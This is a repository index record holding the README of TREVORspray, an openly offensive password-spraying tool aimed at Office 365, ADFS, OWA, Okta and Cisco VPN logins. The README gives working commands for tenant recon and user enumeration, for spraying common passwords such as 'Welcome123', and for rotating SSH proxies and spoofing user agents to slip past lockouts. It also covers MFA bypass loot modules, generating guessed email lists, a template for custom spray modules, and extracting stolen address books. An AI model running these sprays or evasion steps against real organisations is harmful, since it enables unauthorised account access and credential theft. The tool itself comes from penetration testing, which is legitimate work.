{"id":15116282,"url":"https://github.com/blacklanternsecurity/TREVORspray","last_synced_at":"2025-09-27T22:30:22.157Z","repository":{"id":37777256,"uuid":"293375616","full_name":"blacklanternsecurity/TREVORspray","owner":"blacklanternsecurity","description":"TREVORspray is a modular password sprayer with threading, clever proxying, loot modules, and more!","archived":false,"fork":false,"pushed_at":"2024-11-13T00:48:32.000Z","size":207,"stargazers_count":1095,"open_issues_count":3,"forks_count":150,"subscribers_count":18,"default_branch":"trevorspray-v2","last_synced_at":"2025-01-15T20:12:16.567Z","etag":null,"topics":["365","autodiscover","email","exchange","hacking","microsoft","oauth","office","password","passwords","proxy","python","security","socks","spray","spraying","trevor"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/blacklanternsecurity.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2020-09-06T23:02:37.000Z","updated_at":"2025-01-14T13:54:36.000Z","dependencies_parsed_at":"2023-11-14T17:32:08.476Z","dependency_job_id":"122647bd-6f82-44a4-8933-ab10a9d133e1","html_url":"https://github.com/blacklanternsecurity/TREVORspray","commit_stats":{"total_commits":103,"total_committers":5,"mean_commits":20.6,"dds":"0.16504854368932043","last_synced_commit":"70aca7b768937fd450b99ce753a9cad276b65551"},"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blacklanternsecurity%2FTREVORspray","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blacklanternsecurity%2FTREVORspray/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blacklanternsecurity%2FTREVORspray/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/blacklanternsecurity%2FTREVORspray/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/blacklanternsecurity","download_url":"https://codeload.github.com/blacklanternsecurity/TREVORspray/tar.gz/refs/heads/trevorspray-v2","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":234461934,"owners_count":18837202,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["365","autodiscover","email","exchange","hacking","microsoft","oauth","office","password","passwords","proxy","python","security","socks","spray","spraying","trevor"],"created_at":"2024-09-26T01:44:17.137Z","updated_at":"2025-09-27T22:30:22.150Z","avatar_url":"https://github.com/blacklanternsecurity.png","language":"Python","readme":"# TREVORspray 2.0\nTREVORspray is a modular password sprayer with threading, SSH proxying, loot modules, and more!\n\nBy [@thetechr0mancer](https://twitter.com/thetechr0mancer)\n\n[![License](https://img.shields.io/badge/license-GPLv3-blue.svg)](https://raw.githubusercontent.com/blacklanternsecurity/nmappalyzer/master/LICENSE)\n[![Python Version](https://img.shields.io/badge/python-3.6+-blue)](https://www.python.org)\n\n## Installation:\n~~~bash\npip install git+https://github.com/blacklanternsecurity/trevorproxy\npip install git+https://github.com/blacklanternsecurity/trevorspray\n~~~\n\nSee the accompanying [**Blog Post**](blogpost.md) for a fun rant and some cool demos!\n\n![trevorspray-demo](https://user-images.githubusercontent.com/20261699/149219712-8549e15c-2eee-4d7a-a615-e8882b693c3f.gif)\n\n## Features\n- Threads, lots of threads\n- Multiple modules\n - `msol` (Office 365)\n - `adfs` (Active Directory Federation Services)\n - `owa` (Outlook Web App)\n - `okta` (Okta SSO)\n - `anyconnect` (Cisco VPN)\n - custom modules (easy to make!)\n- Tells you the status of each account: if it exists, is locked, has MFA enabled, etc.\n- Automatic cancel/resume (remembers already-tried user/pass combos in `~/.trevorspray/tried_logins.txt`)\n- Round-robin proxy through multiple IPs with `--ssh` or `--subnet`\n- Automatic infinite reconnect/retry if a proxy goes down (or if you lose internet)\n- Spoofs `User-Agent` and other signatures to look like legitimate auth traffic\n- Comprehensive logging\n- Optional `--delay`, `--jitter`, and `--lockout-delay` between requests to bypass lockout countermeasures\n- IPv6 support\n- O365 MFA bypass support (disable with `--no-loot`)\n - IMAP\n - SMTP\n - POP\n - EWS (Exchange Web Services) - Automatically retrieves GAL (Global Address Book)\n - EAS (Exchange ActiveSync)\n - Recommended bypass: BlueMail Android app\n - EXO (Exchange Online PowerShell)\n - UM (Exchange Unified Messaging)\n - AutoDiscover - Automatically retrieves OAB (Offline Address Book)\n - Azure Portal Access\n- Domain `--recon` with the following features:\n - list MX/TXT records\n - list O365 info\n - tenant ID\n - tenant name\n - other tentant domains\n - sharepoint URL\n - authentication urls, autodiscover, federation config, etc.\n - User enumeration (use `--recon` and `--users`):\n - `OneDrive`\n - `Azure Seamless SSO`\n\n## How To - O365\n- First, get a list of emails for `corp.com` and perform a spray to see if the default configuration works. Usually it does.\n- If TREVORspray says the emails in your list don't exist, don't give up. Get the `token_endpoint` with `--recon corp.com`. The `token_endpoint` is the URL you'll be spraying against (with the `--url` option).\n- It may take some experimentation before you find the right combination of `token_endpoint` + email format.\n - For example, if you're attacking `corp.com`, it may not be as easy as spraying `corp.com`. You may find that Corp's parent company Evilcorp owns their Azure tenant, meaning that you need to spray against `evilcorp.com`'s `token_endpoint`. Also, you may find that `corp.com`'s internal domain `corp.local` is used instead of `corp.com`.\n - So in the end, instead of spraying `bob@corp.com` against `corp.com`'s `token_endpoint`, you're spraying `bob@corp.local` against `evilcorp.com`'s.\n\n## Example: Perform recon against a domain (retrieves tenant info, autodiscover, mx records, etc.)\n```bash\ntrevorspray --recon evilcorp.com\n...\n \"token_endpoint\": \"https://login.windows.net/b439d764-cafe-babe-ac05-2e37deadbeef/oauth2/token\"\n...\n```\n\n## Example: Enumerate users via OneDrive (no failed logins)\n```bash\ntrevorspray --recon evilcorp.com -u emails.txt --threads 10\n```\n\n![recon-user-enumeration](https://user-images.githubusercontent.com/20261699/151052308-d938bf6c-f335-4d3e-9c3c-1fd79a188e73.gif)\n\n## Example: Spray against discovered \"token_endpoint\" URL\n```bash\ntrevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b439d764-cafe-babe-ac05-2e37deadbeef/oauth2/token\n```\n\n## Example: Spray with 5-second delay between requests\n```bash\ntrevorspray -u bob@evilcorp.com -p 'Welcome123' --delay 5\n```\n\n## Example: Spray and round-robin between 3 IPs (the current IP is also used, unless `-n` is specified)\n```bash\ntrevorspray -u emails.txt -p 'Welcome123' --ssh root@1.2.3.4 root@4.3.2.1\n```\n\n## Example: Find valid usernames without OSINT \u003e:D\n```bash\n# clone wordsmith dataset\nwget https://github.com/skahwah/wordsmith/releases/download/v2.1.1/data.tar.xz \u0026\u0026 tar -xvf data.tar.xz \u0026\u0026 cd data\n\n# order first initial by occurrence\nordered_letters=asjmkdtclrebnghzpyivfowqux\n\n# loop through first initials\necho -n $ordered_letters | while read -n1 f; do\n # loop through top 2000 USA last names\n head -n 2000 'usa/lnames.txt' | while read last; do\n # generate emails in f.last format\n echo \"${f}.${last}@evilcorp.com\"\n done\ndone | tee f.last.txt\n\ntrevorspray -u f.last.txt -p 'Welcome123'\n```\n\n## Extract data from downloaded LZX files\nWhen TREVORspray successfully bypasses MFA and retrieves an Offline Address Book (OAB), the address book is downloaded in LZX format to `~/.trevorspray/loot`. LZX is an ancient and obnoxious compression algorithm used by Microsoft.\n~~~bash\n# get libmspack (for extracting LZX file)\ngit clone https://github.com/kyz/libmspack\ncd libmspack/libmspack/\n./rebuild.sh\n./configure\nmake\n\n# extract LZX file\n./examples/.libs/oabextract ~/.trevorspray/loot/deadbeef-ce01-4ec9-9d08-1050bdc41131-data-1.lzx oab.bin\n# extract all strings\nstrings oab.bin\n# extract and dedupe emails\negrep -oa '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,6}' oab.bin | tr '[:upper:]' '[:lower:]' | sort -u\n~~~\n\n## TREVORspray - Help:\n```\n$ trevorspray --help\nusage: trevorspray [-h] [-m {owa,okta,auth0,anyconnect,jumpcloud,adfs,msol,example}] [-up USERPASS [USERPASS ...]] [-u USERS [USERS ...]] [-p PASSWORDS [PASSWORDS ...]] [--url URL]\n [-r DOMAIN] [--export-tenants FILE] [-t THREADS] [-f] [-d DELAY] [-ld LOCKOUT_DELAY] [-j JITTER] [-e] [-nl] [--ignore-lockouts] [--timeout TIMEOUT] [--random-useragent]\n [-6] [--proxy PROXY] [-v] [-s USER@SERVER [USER@SERVER ...]] [-i KEY] [-b BASE_PORT] [-n] [--subnet SUBNET] [--interface INTERFACE]\n\nA password sprayer with the option to load-balance traffic through SSH hosts\n\noptions:\n -h, --help show this help message and exit\n\nbasic arguments:\n -m, --module {owa,okta,auth0,anyconnect,jumpcloud,adfs,msol,example}\n Spray module to use (default: msol)\n -up, --userpass USERPASS [USERPASS ...]\n file(s) containing username and password pairs (format: 'username:password')\n -u, --users USERS [USERS ...]\n Usernames(s) and/or file(s) containing usernames\n -p, --passwords PASSWORDS [PASSWORDS ...]\n Password(s) and/or file(s) containing passwords\n --url URL The URL to spray against\n -r, --recon, --enumerate DOMAIN\n Retrieves MX records and info related to authentication, email, Azure, Microsoft 365, etc. If --usernames are specified, this also enables username enumeration.\n --export-tenants FILE\n Export all discovered tenant domains to a file\n\nadvanced arguments:\n Round-robin traffic through remote systems via SSH (overrides --threads)\n\n -t, --threads THREADS\n Max number of concurrent requests (default: 1)\n -f, --force Try all usernames/passwords even if they've been tried before\n -d, --delay DELAY Sleep for this many seconds between requests\n -ld, --lockout-delay LOCKOUT_DELAY\n Sleep for this many additional seconds when a lockout is encountered\n -j, --jitter JITTER Add a random delay of up to this many seconds between requests\n -e, --exit-on-success\n Stop spray when a valid cred is found\n -nl, --no-loot Don't execute loot activites for valid accounts\n --ignore-lockouts Forces the spray to continue and not stop when multiple account lockouts are detected\n --timeout TIMEOUT Connection timeout in seconds (default: 10)\n --random-useragent Add a random value to the User-Agent for each request\n -6, --prefer-ipv6 Prefer IPv6 over IPv4\n --proxy PROXY Proxy to use for HTTP and HTTPS requests\n -v, --verbose, --debug\n Show which proxy is being used for each request\n\nSSH Proxy:\n Round-robin traffic through remote systems via SSH (overrides --threads)\n\n -s, --ssh USER@SERVER [USER@SERVER ...]\n Round-robin load-balance through these SSH hosts (user@host) NOTE: Current IP address is also used once per round\n -i, -k, --key KEY Use this SSH key when connecting to proxy hosts\n -b, --base-port BASE_PORT\n Base listening port to use for SOCKS proxies\n -n, --no-current-ip Don't spray from the current IP, only use SSH proxies\n\nSubnet Proxy:\n Send traffic from random addresses within IP subnet\n\n --subnet SUBNET Subnet to send packets from\n --interface INTERFACE\n Interface to send packets on\n```\n\n## Writing your own Spray Modules\nIf you need to spray a service/endpoint that's not supported yet, you can write your own spray module! This is a great option because custom modules benefit from all of TREVORspray's features -- e.g. proxies, delay, jitter, etc.\n\nWriting your own spray module is pretty straightforward. Create a new `.py` file in `lib/sprayers` (e.g. `lib/sprayers/custom_sprayer.py`), and create a class that inherits from `BaseSprayModule`. You can call the class whatever you want. Fill out the HTTP method and any other parameters that you need in the requests (you can reference `lib/sprayers/base.py` or any of the other modules for examples).\n - You only need to implement one method on your custom class: `check_response()`. This method evaluates the HTTP response to determine whether the login was successful.\n - Once you're finished, you can use the custom spray module by specifying the name of your python file (without the `.py`) on the command line, e.g. `trevorspray -m custom_sprayer -u users.txt -p Welcome123`.\n~~~python\n# Example spray module\n\nfrom .base import BaseSprayModule\n\nclass SprayModule(BaseSprayModule):\n\n # HTTP method\n method = 'POST'\n # default target URL\n default_url = 'https://login.evilcorp.com/'\n # body of request\n request_data = 'user={username}\u0026pass={password}\u0026group={otherthing}'\n # HTTP headers\n headers = {}\n # HTTP cookies\n cookies = {}\n # Don't count nonexistent accounts as failed logons\n fail_nonexistent = False\n\n headers = {\n 'User-Agent': 'Your Moms Smart Vibrator',\n }\n\n def initialize(self):\n '''\n Get additional arguments from user at runtime\n NOTE: These can also be passed via environment variables beginning with \"TREVOR_\":\n TREVOR_otherthing=asdf\n '''\n while not self.trevor.runtimeparams.get('otherthing', ''):\n self.trevor.runtimeparams.update({\n 'otherthing': input(\"What's that other thing? \")\n })\n\n return True\n\n\n def check_response(self, response):\n '''\n returns (valid, exists, locked, msg)\n '''\n\n valid = False\n exists = None\n locked = None\n msg = ''\n\n if getattr(response, 'status_code', 0) == 200:\n valid = True\n exists = True\n msg = 'Valid cred'\n\n return (valid, exists, locked, msg)\n~~~\n\nCREDIT WHERE CREDIT IS DUE - MANY THANKS TO:\n- [@dafthack](https://twitter.com/dafthack) for writing [MSOLSpray](https://github.com/dafthack/MSOLSpray)\n- [@Mrtn9](https://twitter.com/Mrtn9) for his Python port of [MSOLSpray](https://github.com/MartinIngesen/MSOLSpray)\n- [@KnappySqwurl](https://twitter.com/KnappySqwurl) for being a splunk wizard\n- [@CarsonSallis](https://github.com/CarsonSallis) for the O365 MFA bypasses\n- [@DrAzureAD](https://twitter.com/DrAzureAD) for the Azure AD recon features ([AADInternals](https://github.com/Gerenios/AADInternals))\n- [@nyxgeek](https://twitter.com/nyxgeek) for the OneDrive user enumeration ([onedrive_user_enum](https://github.com/nyxgeek/onedrive_user_enum))\n- [@gremwell](https://twitter.com/gremwell) for the Seamless SSO user enumeration ([o365enum](https://github.com/gremwell/o365enum))\n\n![trevor](https://user-images.githubusercontent.com/20261699/92336575-27071380-f070-11ea-8dd4-5ba42c7d04b7.jpeg)\n\n`#trevorforget`\n","funding_links":[],"categories":["Python","Red Team","Password Generation"],"sub_categories":["Initial Access","Spraying Tools"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fblacklanternsecurity%2FTREVORspray","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fblacklanternsecurity%2FTREVORspray","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fblacklanternsecurity%2FTREVORspray/lists"}